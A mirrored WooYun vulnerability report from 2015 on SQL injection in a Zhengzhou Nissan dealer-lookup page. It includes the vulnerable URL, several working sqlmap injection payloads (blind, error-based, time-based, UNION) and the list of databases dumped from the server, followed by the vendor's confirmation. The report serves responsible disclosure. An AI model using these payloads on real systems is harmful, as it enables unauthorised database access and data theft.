乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-21: 细节已通知厂商并且等待厂商处理中 2015-11-23: 厂商已经确认,细节仅向厂商公开 2015-12-03: 细节向核心白帽子及相关领域专家公开 2015-12-13: 细节向普通白帽子公开 2015-12-23: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
郑州日产的购车助手子站的经销商查询链接存在注入
注入点:http://e.zznissan.com.cn/ajax_jxs_point.php?jxs=%E6%AD%A6%E6%B1%89&province=824&city=&address=jxs和province都存在注入,后两个没测
---Parameter: province (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: jxs=%E6%AD%A6%E6%B1%89&province=824 AND 1963=1963&city=&address= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: jxs=%E6%AD%A6%E6%B1%89&province=824 AND (SELECT 2196 FROM(SELECT COUNT(*),CONCAT(0x717a6a7171,(SELECT (ELT(2196=2196,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&city=&address= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: jxs=%E6%AD%A6%E6%B1%89&province=824 AND SLEEP(5)&city=&address= Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: jxs=%E6%AD%A6%E6%B1%89&province=824 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6a7171,0x63614e476e4f62674c45,0x71766a7171),NULL,NULL,NULL,NULL,NULL-- &city=&address=---web application technology: Apacheback-end DBMS: MySQL 5.0available databases [41]:[*] club_15[*] ebuy[*] ebuy1217[*] events[*] events_2014cgr[*] events_2014five[*] events_pickupStory[*] ezznissan[*] information_schema[*] innodb[*] jinzhiwen[*] maintain[*] mysql[*] nissan[*] nissan_2015cgr[*] nissan_jxs[*] nissan_patrol[*] nissanmedia[*] nissantest[*] paladin[*] paladinclub[*] paladinclubtemp[*] palaqi[*] performance_schema[*] specialcar[*] test[*] topic[*] tower_15[*] wqw_five[*] wqw_mx6gc[*] wqw_succk[*] xuhui[*] yaguan[*] zznissan[*] zznissan_eng[*] zznissan_jnds[*] zznissan_lms2015[*] zznissan_mx6sj2015[*] zznissan_mx6tg2015[*] zznissan_pro[*] zznissanbak
危害等级:中
漏洞Rank:5
确认时间:2015-11-23 09:40
谢谢对我司关注!该漏洞此前已在其他平台收到相关信息,正在修复中。
暂无